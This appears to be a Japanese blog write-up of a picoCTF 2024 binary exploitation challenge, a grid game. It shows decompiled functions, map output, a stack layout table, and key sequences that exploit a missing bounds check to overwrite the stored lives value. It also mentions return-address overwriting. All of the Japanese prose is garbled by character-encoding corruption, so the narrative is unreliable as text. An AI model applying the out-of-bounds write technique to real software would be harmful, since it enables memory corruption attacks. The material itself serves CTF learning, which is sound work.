*(undefined *)(*player * 0x5a + map + player[1]) = player_tile;
player[2] = player[2] + -1;
return;
}
実際ã«å‹•ã‹ã—ã¦ã¿ã¾ã™ã€‚wasd を押ã—ã¦ã¿ã¾ã™ã€‚wã€sã€aã€dã‚ーã§ãƒ—レーヤを移動ã•ã›ã‚‹ã¿ãŸã„ã§ã™ã。w ãŒâ†‘ã€sãŒâ†“ã€aãŒâ†ã€dãŒâ†’ ã®ã‚ˆã†ã§ã™ã€‚
ã“ã®ãƒžãƒƒãƒ—ã¯ã€æ¨ªã« 90マスã€ç¸¦ã« 30マスã‚るよã†ã§ã™ã€‚座標ã¯ã€å·¦ä¸ŠãŒï¼ˆ0, 0)ã§ã€å³ä¸‹ã«å‘ã‹ã£ã¦å¢—ãˆã¦ã„ãã¾ã™ã€‚init_player関数ã§ã€ãƒ—レーヤã®ä½ç½®ï¼ˆ4, 4)ã¨ã€ãƒ©ã‚¤ãƒ•ï¼ˆ50)ãŒåˆæœŸåŒ–ã•ã‚Œã¾ã™ã€‚
# ãŒã‚´ãƒ¼ãƒ«ãªã®ã‹ã€X ãŒã‚´ãƒ¼ãƒ«ãªã®ã‹ã€‚# を目指ã—ã¦ã¿ã¾ã™ã€‚# ã«å½“ãŸã‚‹ã¨ã€You hit an obstacle! ã¨è¨€ã‚ã‚Œã¦çµ‚了ã—ã¾ã—ãŸã€‚
X を目指ã—ã¦ã¿ã‚‹ã¨ã€é€”ä¸ã§ã€No more lives left. Game over! ã¨è¨€ã‚ã‚Œã¾ã—ãŸã€‚å‹•ã‘ã‚‹é‡ã«é™ã‚ŠãŒã‚るよã†ã§ã™ã€‚
1段階目ã®æ¡ä»¶ã¯ã€X ã«ãŸã©ã‚Šã¤ãã“ã¨ã®ã‚ˆã†ã§ã™ã€‚
ã‚ã¨ã€lã‚ーã¨ã€pã‚ーãŒä½¿ãˆã‚‹ã‚ˆã†ã§ã™ãŒã€lã‚ーã¯ã€ãƒ—レーヤä½ç½®ã® @ マークを変更ã§ãã‚‹ã ã‘ã®ã‚ˆã†ã«è¦‹ãˆã¾ã™ã€‚pã‚ーã¯ã€solve_round関数ãŒå‡¦ç†ã•ã‚Œã¾ã™ã€‚自動ã§å‹•ä½œã™ã‚‹é–¢æ•°ã®ã‚ˆã†ã§ã™ã€‚
ã¾ã¨ã‚‚ã«æ“作ã—ã¦ã‚‚ã€X ã«ãŸã©ã‚Šã¤ãã®ã¯é›£ã—ã„ã§ã™ã。solve_round関数ãŒæ°—ã«ãªã‚Šã¾ã™ã€‚
$ ./game
Player position: 4 4
Level: 1
End tile position: 29 89
Lives left: 50
..........................................................................................
..........................................................................................
..........................................................................................
....@.....................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
..........................................................................................
.........................................................................................X
solve_round関数ã§ã™ã€‚ã¤ã„ã§ã«ã€find_player_pos関数ã€find_end_tile_pos関数ã€print_lives_left関数ã€clear_screen関数ã§ã™ã€‚ã„ãã¤ã‹åˆ¤æ˜Žã—ãŸå¤‰æ•°ã¯åå‰ã‚’変更ã—ã¦ã„ã¾ã™ã€‚solve_round関数ã¯ã€è‡ªå‹•ã§æ“作ã—ã¦ãれる関数ã§ã—ょã†ã‹ã€‚
int solve_round(undefined4 map,int *player,undefined4 level)
{
int iVar1;
while (player[1] != 0x59) {
if (player[1] < 0x59) {
move_player(player,100,map,level);
}
else {
move_player(player,0x61,map,level);
}
print_map(map,player,level);
}
while (*player != 0x1d) {
if (player[1] < 0x1d) {
move_player(player,0x77,map,level);
}
else {
move_player(player,0x73,map,level);
}
print_map(map,player,level);
}
sleep(0);
iVar1 = *player;
if (iVar1 == 0x1d) {
iVar1 = player[1];
}
return iVar1;
}
void find_player_pos(int map,undefined4 *level)
{
int local_14;
int local_10;
local_10 = 0;
do {
if (0x1d < local_10) {
return;
}
for (local_14 = 0; local_14 < 0x5a; local_14 = local_14 + 1) {
if (*(char *)(local_14 + map + local_10 * 0x5a) == player_tile) {
printf("Player position: %d %d\n",local_10,local_14);
printf("Level: %d\n",*level);
return;
}
}
local_10 = local_10 + 1;
} while( true );
}
void find_end_tile_pos(int map)
{
int local_14;
int local_10;
local_10 = 0;
do {
if (0x1d < local_10) {
return;
}
for (local_14 = 0; local_14 < 0x5a; local_14 = local_14 + 1) {
if (*(char *)(local_14 + map + local_10 * 0x5a) == 'X') {
printf("End tile position: %d %d\n",local_10,local_14);
return;
}
}
local_10 = local_10 + 1;
} while( true );
}
void print_lives_left(int player)
{
printf("Lives left: %d\n",*(undefined4 *)(player + 8));
return;
}
void clear_screen(void)
{
printf("\x1b[2J");
fflush(_stdout);
return;
}
solve_round関数㮠2個目㮠while ã®æ¡ä»¶ãŒå¤‰ã ã¨æ€ã„ã¾ã™ãŒã€é–¢ä¿‚ãªã•ãã†ã§ã™ã€‚ã ã„ãŸã„分ã‹ã£ã¦ãã¾ã—ãŸã€‚マップã®ç¯„囲をãƒã‚§ãƒƒã‚¯ã•ã‚Œãªã„ã®ã§ã€è¶…ãˆã¦ã‚‚進ã‚ã¦ã—ã¾ã„ã¾ã™ã€‚ã‚ã€ãƒžãƒƒãƒ—ã®ç¯„囲を超ãˆã¦ã€ä»»æ„ã®ãƒžãƒ¼ã‚¯ã§å€¤ã‚’書ãæ›ãˆã‚‹ã¨ã„ã†ã“ã¨ã ã¨æ€ã„ã¾ã™ï¼
ã¡ãªã¿ã«ã€å·¦ã«é€†å‘ãã«é€²ã‚“ã§ã€ãƒžã‚¤ãƒŠã‚¹ã«ã™ã‚‹ã¨ã€è¡¨ç¤ºä¸Šã¯ã‚´ãƒ¼ãƒ«ã«ç€ã‘ã¾ã™ãŒã€åº§æ¨™ã¨ã—ã¦ã¯ãƒžã‚¤ãƒŠã‚¹ã¨ãªã£ã¦ã—ã¾ã„ã€æ¡ä»¶ã® ä¸‹æ–¹å‘ 29ã€å³æ–¹å‘ 89 ã¨ã¯ãªã‚‰ãªã„ã®ã§ã€ã‚´ãƒ¼ãƒ«åˆ¤å®šã«ãªã‚Šã¾ã›ã‚“ã§ã—ãŸã€‚ã†ã¾ã出æ¥ã¦ã¾ã™ã(笑)。
スタックã®åˆ†æžã‚’è¡Œã„ã¾ã™ã€‚スタック㯠main関数ã®å…ˆé ã§ã€0xab0(2736byte)確ä¿ã•ã‚Œã¾ã™ã€‚
| アドレス |
サイズ |
内容 |
| ebp |
|
|
| ebp - 0xc(12byte) |
4 |
local_14 |
| ebp - 0xa99(2713byte) |
2700 |
マップ |
| ebp - 0xaa8(2728byte) |
12(15?) |
下å‘ãã®ã‚ªãƒ•ã‚»ãƒƒãƒˆã€å³æ–¹å‘ã®ã‚ªãƒ•ã‚»ãƒƒãƒˆã€ãƒ©ã‚¤ãƒ• |
| ebp - 0xaac(2732byte) |
4 |
レベル |
ã¾ãšã€ãƒ©ã‚¤ãƒ•ã‚’書ãæ›ãˆã¦ã¿ã¾ã™ã€‚
左㫠4+7(aaaaaaaaaaa)行ã£ã¦ã€ä¸Šã« 3+1(wwww)行ãã¾ã™ã€‚ã“ã“ã«ãƒ©ã‚¤ãƒ•ãŒã‚ã‚‹ã¯ãšã§ã™ã€‚ã“ã“を大ããªå€¤ï¼ˆlz)ã«æ›¸ãæ›ãˆã¾ã™ã€‚ã“ã“ã¾ã§ã‚„ã£ãŸã¨ã“ã‚ã§æƒ³å®šå¤–ãŒã‚ã‚Šã¾ã—ãŸã€‚何ã«æ›¸ãæ›ãˆã¦ã‚‚ 0x2e(.)ã«æ›¸ã戻ã•ã‚Œã¦ã—ã¾ã„ã¾ã™ã€‚ã“ã‚Œã¯åº§æ¨™ã‚’ä»»æ„ã®ä½ç½®ã«ã™ã‚‹ã“ã¨ã¯é›£ã—ã„ã¨æ€ã„ã¾ã™ã€‚
ã¨ã„ã†ã‚ã‘ã§ã€lã‚ーã¯ä½¿ãˆãªã„ã®ã§ã€ãƒ©ã‚¤ãƒ•ã®æœ€ä¸Šä½ãƒã‚¤ãƒˆã‚’ 0x2e(.)ã«ã—ã¦ã€ãƒ©ã‚¤ãƒ•ã‚’ã¨ã¦ã‚‚大ãã„値ã«ã—ã¦ã¿ã¾ã™ã€‚左㫠4+4(aaaaaaaa)行ã£ã¦ã€ä¸Šã« 3+1(wwww)行ã£ã¦ã€ä¸‹ã« 1ã¤æˆ»ã‚Šã¾ã™ï¼ˆs)。ã¤ã¾ã‚Šã€aaaaaaaawwwws ã§ã™ã€‚ã‚„ã£ã¦ã¿ã¾ã™ã€‚ライフ㌠771751972 ã«ãªã‚Šã¾ã—ãŸï¼
ã‚ã¨ã¯ã€d 㨠s ã§ã‚´ãƒ¼ãƒ«ã¾ã§è¡Œã‘ã°ã‚¯ãƒªã‚¢ã§ã™ã€‚ã‚れ?クリアã§ãã¾ã›ã‚“。GDB ã§è¦‹ã¦ã¿ã¾ã™ã€‚ã‚ã€æ¨ªæ–¹å‘ã®åº§æ¨™ãŒãƒžã‚¤ãƒŠã‚¹ã®ã¾ã¾ã§ã—ãŸã€‚å³æ–¹å‘ã«ä¸€å‘¨ã—ã¾ã™ã€‚GDB ãŒãƒªã‚¿ãƒ¼ãƒ³ã‚ーを押ã™ã¨ã€ç›´å‰ã®ã‚³ãƒžãƒ³ãƒ‰ã‚’ç¹°ã‚Šè¿”ã—ã¦ãれる機能ãŒã¨ã¦ã‚‚ã‚ã‚ŠãŒãŸã„ã§ã™ã€‚一周ã™ã‚‹ã¨ã‚´ãƒ¼ãƒ«ã§ãã¾ã—ãŸã€‚レベル 2ã§ã™ï¼
マップã®éšœå®³ç‰©ã®ä½ç½®ãŒå³ã«ä¸€ã¤ãšã‚Œã¾ã—ãŸã€‚乱数を使ã£ã¦ãŸã‚ˆã†ãªã®ã§ã€ãŸã¾ãŸã¾ã§ã—ょã†ã‹ã€‚基本ã¯åŒã˜æ–¹æ³•ã§ã„ã‘ã‚‹ã¨æ€ã„ã¾ã™ã€‚ã—ã‹ã—ã€ã„ã¡ã„ã¡æ‰‹ä½œæ¥ã§ã‚´ãƒ¼ãƒ«ã«å‘ã‹ã†ã®ã¯å¤§å¤‰ã§ã™ã€‚pã‚ーã®æ©Ÿèƒ½ã‚’使ã£ã¦ã¿ã¾ã™ã€‚aaaaaaaawwwwsp ã§ã™ã€‚ã ã„ã¶æ¥½ã¡ã‚“ã§ã™ã€‚ã“ã®å…¥åŠ›ã‚’ç¹°ã‚Šè¿”ã›ã°ã‚¯ãƒªã‚¢ã§ããã†ã§ã™ã€‚
レベル 4 ã¾ã§æ¥ã¾ã—ãŸãŒã€å…ˆã«é€²ã‚ã¾ã›ã‚“。æ¡ä»¶æ–‡ã‚’見直ã™ã¨ã€ãƒ¬ãƒ™ãƒ« 4 ã®ã¨ãã¯ã€æœ€å¾Œã® while ã®æ¡ä»¶ã‚’çªç ´ã™ã‚‹å¿…è¦ãŒã‚ã‚Šãã†ã§ã™ã€‚tate 㨠yoko ã®æ¡ä»¶ã¯æº€ãŸã—ã¦ã„ã¾ã™ãŒã€ãƒ¬ãƒ™ãƒ« 5 ã¨ã€local_14 ã®æ¡ä»¶ãŒæº€ãŸã›ã¦ã„ã¾ã›ã‚“。local_14 ã¯ã€ãƒ¬ãƒ™ãƒ« - 1 ã§ã™ã。両方åŒæ™‚ã«ä¸ŠãŒã‚Œã°ã‚¯ãƒªã‚¢ã§ããã†ã§ã™ãŒã€ãƒ¬ãƒ™ãƒ«ã‚’インクリメントã™ã‚‹ ifæ–‡ã®ä¸ã«å…¥ã‚Œã¾ã›ã‚“。
ã„ã‚ã„ã‚ã‚„ã£ã¦ã¿ã¾ã—ãŸãŒã€ã¡ã‚‡ã£ã¨åˆ†ã‹ã‚Šã¾ã›ã‚“。ギブアップã—ã¾ã™ã€‚
ä»–ã®æ–¹ã® writeup ã‚’å°‘ã—見ã•ã›ã¦ã‚‚らã£ãŸã¨ã“ã‚ã€ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’書ãæ›ãˆã¦ã€ã‚¸ãƒ£ãƒ³ãƒ—ã™ã‚‹ãã†ã§ã™ã€‚ãªã‚‹ã»ã©ã§ã™ã€‚リターンアドレスã®æ›¸ãæ›ãˆã¯æ€ã„ã¤ãã¾ã›ã‚“ã§ã—ãŸã€‚ã‚„ã¯ã‚Šã€Hard å•é¡Œã¯ã€é›£ã—ã‹ã£ãŸã§ã™ã€‚
ç¾æ®µéšŽã§ã¯ã€Medium å•é¡Œã¯ã€ä½•ã¨ã‹è§£ã‘ãã†ã§ã™ãŒã€Hard å•é¡Œã¯ã€ã‚‚ã†å°‘ã—ã˜ã£ãã‚Šå–り組む必è¦ãŒã‚ã‚Šã¾ã™ã€‚最後ã®æ–¹ã¯ã€ã‚¬ãƒãƒ£ã‚¬ãƒãƒ£ã‚„ã£ã¦ãŸæ„Ÿã˜ãŒã‚ã£ã¦ã€ã‚ˆããªã‹ã£ãŸã¨æ€ã„ã¾ã™ã€‚
high frequency troubles(500ãƒã‚¤ãƒ³ãƒˆï¼‰
未ç€æ‰‹ã§ã™ã€‚
high frequency troubleså•é¡Œ
ãŠã‚ã‚Šã«
今回ã¯ã€picoCTF ã® picoCTF 2024 ã®ã†ã¡ã€Binary Exploitation ã¨ã„ã†ã‚«ãƒ†ã‚´ãƒªã®å…¨10å•ã‚’ã‚„ã‚ŠãŸã‹ã£ãŸã®ã§ã™ãŒã€æœ€å¾Œã® 2å•ã¯ã ã„ã¶ãƒ¬ãƒ™ãƒ«ãŒé«˜ã‹ã£ãŸã§ã™ã€‚最後㮠1å•ã¯ã€ã‚‚ã†å°‘ã—経験をç©ã‚“ã§ã‹ã‚‰ãƒãƒ£ãƒ¬ãƒ³ã‚¸ã—ãŸã„ã¨æ€ã„ã¾ã™ã€‚
次ã¯ã€picoCTF 2024 ã® Reverse Engineering ã«æŒ‘戦ã—ã¦ã¿ãŸã„ã¨æ€ã„ã¾ã™ã€‚
最後ã«ãªã‚Šã¾ã—ãŸãŒã€ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ã‚°ãƒ«ãƒ¼ãƒ—ã®ãƒ©ãƒ³ã‚ングã«å‚åŠ ä¸ã§ã™ã€‚
気楽ã«ãƒãƒãƒƒã¨ã‚ˆã‚ã—ããŠé¡˜ã„ã„ãŸã—ã¾ã™ðŸ™‡
今回ã¯ä»¥ä¸Šã§ã™ï¼
最後ã¾ã§ãŠèªã¿ã„ãŸã ãã€ã‚ã‚ŠãŒã¨ã†ã”ã–ã„ã¾ã—ãŸã€‚
